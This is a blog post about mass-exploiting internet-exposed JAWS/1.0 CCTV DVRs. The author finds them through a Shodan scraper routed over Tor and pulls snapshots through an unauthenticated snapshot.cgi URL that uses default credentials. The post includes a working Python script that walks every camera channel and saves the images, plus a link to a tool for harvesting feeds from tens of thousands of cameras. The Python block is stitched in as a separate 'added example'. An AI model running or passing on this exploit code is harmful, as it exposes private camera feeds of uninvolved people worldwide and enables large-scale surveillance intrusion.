So I went on my daily browse on the netsec temple, reddit.com/r/netsec, to pay my respects as usual, pray to the hacking gods for the prosperity of my servers and offer my upvotes.
The gods were kind and they rewarded me with much fun. One fellow white hat hacker, Andrew Tierney, was blessed with the joy of vulnerability discovery. When I saw the article https://www.pentestpartners.com/blog/pwning-cctv-cameras/ https://www.reddit.com/r/netsec/comments/466jap/pwning_cctv_cameras/ I immediately knew what I had to do. I needed to find and exploit every single one of those DVR systems connected to the internet and provide the world a simple, easy-to-understand proof of concept, proving that these things are the devil's work and we must not install them in our homes.
It's also one hell of a way to show off my awesome coding skills given to me by the kind grayhat gods.
So if you read the article on this excellent sample of human stupidity, you will see lots and lots of vulnerabilities, including:
- Default credentials: admin with a blank password
- Remote root shell over the web interface
- Client-side (JavaScript-only) authentication
- Each DVR emails daily screenshots to a fixed address (the creator of the firmware)
In other words, this DVR system is worse than the deliberately vulnerable applications that young netsec students are trained on.
The only problem is finding them. Fortunately, as Andrew states, you can easily find those devices in Shodan.io. But we want to find each and every one of them. And we don’t have a Shodan premium account.
One side note: I have been working on multiple libraries. I didn't intend to release them, but this POC would be faster to build if I used them. If nothing else, I will write them better if I release them. You know, so that people won't make fun of my hacky code (please don't).
Fortunately, I was already working on a Shodan.io scraper called ShodanScanner, which I have also released as open source on my GitHub page here.
So my thought was I will write my first program to use ShodanScanner and I will use it to download all the screenshots for all vulnerable web cameras Shodan can detect.
ShodanScanner in turn also depends on another library that I wrote called TorRange uploaded here.
TorRange is a library that can create multiple threads and consume an input of any size efficiently. A Tor instance is tied to each thread if needed, and the thread can control the connection (restart the circuit, change IP, etc.). The process can be stopped and resumed at any point.
All libraries are Maven projects, although not uploaded yet to Maven Central. A bit too much for a simple POC (proof of concept), but that's the way I program. After all, I am a Software Engineer. The actual POC is 150 lines. The rest is reusable libraries.
So the only thing we have to do is fire up ShodanScanner and tell it to scan Shodan for the banner string: JAWS/1.0.
So back to our cameras. The screenshot is easy to download. You know, considering the utter lack of sane authentication.
I connected to a couple of cameras:
Please note that the above is live video of the cameras. You can basically see the live feed for more than 40 000 cameras worldwide.
I quickly found the link to download the image, which is:
http://ip/cgi-bin/snapshot.cgi?chn=1&u=admin&p=&q=0&d=1
http://ip/cgi-bin/snapshot.cgi?chn=2&u=admin&p=&q=0&d=1
The chn parameter is the channel index: you download the snapshot for each camera by incrementing chn by one.
You know when you have run out of channels from the response headers, specifically the Content-Disposition header: once the channels are exhausted, the attachment filename is camera_0_[…]. If I get that, I know there are no more cameras and I move on to the next device. And if you didn't read the article: this firmware uses JavaScript authentication. In a browser we would set the appropriate cookies (username, password) to any values, or disable JavaScript altogether. When crawling from Java, JavaScript authentication = no authentication.
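The channel walk described above, written out as an added Python example (this is not the ccSnapTv code, which is Java): build the snapshot URL for each chn, read the Content-Disposition filename from the response, and stop at the first camera_0_ marker. The fake DVR at the bottom, the date in its filenames and the 203.0.113.5 address are constructed so the example runs offline; the max_channels cap is my own safeguard against a device that never returns the marker.

```python
import re
import urllib.request
from typing import Callable, Dict, Iterator, Mapping, Optional, Tuple

# Snapshot endpoint exactly as given in the post; chn is the 1-based channel index.
def snapshot_url(ip: str, chn: int) -> str:
    return f"http://{ip}/cgi-bin/snapshot.cgi?chn={chn}&u=admin&p=&q=0&d=1"

# Matches both filename="quoted.jpg" and filename=bare.jpg forms.
_FILENAME_RE = re.compile(r'filename\*?=(?:"([^"]*)"|([^;]+))', re.IGNORECASE)

def content_disposition_filename(headers: Mapping[str, str]) -> Optional[str]:
    """Return the attachment filename from Content-Disposition, or None if absent."""
    value = next((v for k, v in headers.items() if k.lower() == "content-disposition"), None)
    if value is None:
        return None
    m = _FILENAME_RE.search(value)
    if not m:
        return None
    return (m.group(1) if m.group(1) is not None else m.group(2)).strip()

def is_end_marker(headers: Mapping[str, str]) -> bool:
    """The firmware answers a non-existent channel with a camera_0_... attachment."""
    name = content_disposition_filename(headers)
    return name is not None and name.startswith("camera_0_")

# A fetcher takes a URL and returns (response headers, body bytes).
Fetcher = Callable[[str], Tuple[Mapping[str, str], bytes]]

def walk_channels(ip: str, fetch: Fetcher, max_channels: int = 64) -> Iterator[Tuple[int, bytes]]:
    """Yield (chn, jpeg_bytes) for each real channel, stopping at the camera_0_ marker.
    max_channels is an added safety cap, not something the firmware enforces."""
    for chn in range(1, max_channels + 1):
        headers, body = fetch(snapshot_url(ip, chn))
        if is_end_marker(headers):
            return
        yield chn, body

def collect_snapshots(ip: str, fetch: Fetcher) -> Dict[int, bytes]:
    return {chn: body for chn, body in walk_channels(ip, fetch)}

def urllib_fetch(url: str, timeout: float = 10.0) -> Tuple[Mapping[str, str], bytes]:
    """Real fetcher. No cookies are set: the login check lives only in the page's
    JavaScript, so the CGI endpoint answers a plain GET. Only call this against
    devices you are authorised to test."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return dict(resp.headers.items()), resp.read()

# Constructed fake DVR for offline use: two channels, then the camera_0_ end marker.
def fake_dvr_fetch(url: str) -> Tuple[Mapping[str, str], bytes]:
    chn = int(re.search(r"chn=(\d+)", url).group(1))
    if chn <= 2:
        hdrs = {"Content-Disposition": f'attachment; filename="camera_{chn}_20160216.jpg"'}
        return hdrs, b"\xff\xd8fakejpeg" + bytes([chn])  # fake JPEG-ish payload
    return {"Content-Disposition": 'attachment; filename="camera_0_20160216.jpg"'}, b""

if __name__ == "__main__":
    for chn, jpeg in walk_channels("203.0.113.5", fake_dvr_fetch):
        print(f"channel {chn}: {len(jpeg)} bytes")
```

Swap fake_dvr_fetch for urllib_fetch to run the same walk against a real host; the stop condition and the channel loop are unchanged, which is the point of injecting the fetcher.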
From there my task was easy. ccSnapTv was built. I told my brother Rafael about it and asked him to test it. He made two excellent suggestions: store the images per country, and create a POC video.
I really liked the POC video idea. You can babble for hours trying to explain a concept to a non-technical person, but there is nothing better than a visual representation of the idea. And a video where cameras are hacked live is the best presentation you can have.
So here is the video:
Source on github:
https://github.com/nikos-glikis/ccSnapTv